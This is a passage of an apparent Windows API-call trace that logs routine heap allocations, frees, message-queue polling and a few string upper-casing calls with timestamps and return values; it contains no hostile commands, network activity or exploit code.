[0206.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0206.870] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0206.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0206.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0206.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0206.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0206.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0206.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0206.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0206.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0206.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0206.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0206.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0206.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0206.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0206.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0206.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0206.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0206.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0206.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0206.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0206.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0206.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0206.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0206.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0206.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0206.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0206.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0206.872] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0206.872] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0206.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0206.872] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0206.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0206.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0206.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9570 [0206.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0206.872] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0206.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0206.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0206.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0206.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0206.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0206.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0206.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0206.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0206.873] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0206.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0206.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0206.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0206.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0206.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0206.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0206.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0206.873] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0206.873] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0206.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0206.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0206.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0206.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0206.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0206.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0206.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0206.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0206.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0206.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0206.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0206.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0206.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0206.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0206.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0206.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0206.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0206.874] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0206.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0206.875] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0206.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0206.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0206.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0206.875] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0206.875] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0206.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0206.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0206.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0206.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0206.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0206.875] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0206.875] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0206.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0206.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0206.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0206.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0206.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0206.876] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0206.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0206.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0206.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9708 [0206.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0206.876] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0206.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0206.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0206.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0206.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0206.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0206.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0206.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0206.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0206.877] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0206.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0206.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0206.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0206.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0206.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0206.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0206.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0206.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0206.877] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0206.877] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0206.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0206.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0206.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0206.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0206.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0206.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0206.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0206.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0206.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0206.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0206.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0206.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0206.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0206.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0206.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0206.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0206.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0206.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0206.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0206.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0206.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0206.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0206.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0206.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0206.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0206.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0206.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0206.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0206.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0206.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0206.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0206.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0206.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0206.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0206.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0206.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0206.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0206.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0206.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0206.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0206.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0206.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0206.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0206.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0206.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0206.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0206.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0206.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0206.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0206.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0206.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0206.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0206.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0206.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0206.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0206.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0206.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0206.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0206.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0206.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0206.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0206.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0206.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0206.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0206.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0206.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0206.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0206.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0206.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0206.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0206.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0206.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0206.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0206.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0206.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0206.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0206.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34e1cb0 | out: hHeap=0x25c0000) returned 1 [0206.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0206.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0206.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0206.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 